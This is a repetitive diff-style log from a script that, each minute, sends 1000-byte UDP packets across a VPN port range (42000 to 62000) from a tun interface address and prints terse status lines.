+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:58:05 +Starting port fill at 2020-09-06 13:59:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 13:59:05 +Starting port fill at 2020-09-06 14:00:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:00:06 +Starting port fill at 2020-09-06 14:01:02 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 14:01:07 +Starting port fill at 2020-09-06 14:02:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:02:06 +Starting port fill at 2020-09-06 14:03:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:03:06 +Starting port fill at 2020-09-06 14:04:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:04:04 +Starting port fill at 2020-09-06 14:05:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:05:05 +Starting port fill at 2020-09-06 14:06:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 14:06:06 +Starting port fill at 2020-09-06 14:07:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:07:06 +Starting port fill at 2020-09-06 14:08:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:08:06 +Starting port fill at 2020-09-06 14:09:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:09:04 +Starting port fill at 2020-09-06 14:10:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 14:10:06 +Starting port fill at 2020-09-06 14:11:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:11:06 +Starting port fill at 2020-09-06 14:12:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 14:12:07 +Starting port fill at 2020-09-06 14:13:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:13:05 +Starting port fill at 2020-09-06 14:14:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:14:05 +Starting port fill at 2020-09-06 14:15:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:15:06 +Starting port fill at 2020-09-06 14:16:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:16:05 +Starting port fill at 2020-09-06 14:17:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:17:06 +Starting port fill at 2020-09-06 14:18:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 14:18:07 +Starting port fill at 2020-09-06 14:19:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:19:05 +Starting port fill at 2020-09-06 14:20:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:20:06 +Starting port fill at 2020-09-06 14:21:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:21:05 +Starting port fill at 2020-09-06 14:22:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:22:04 +Starting port fill at 2020-09-06 14:23:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 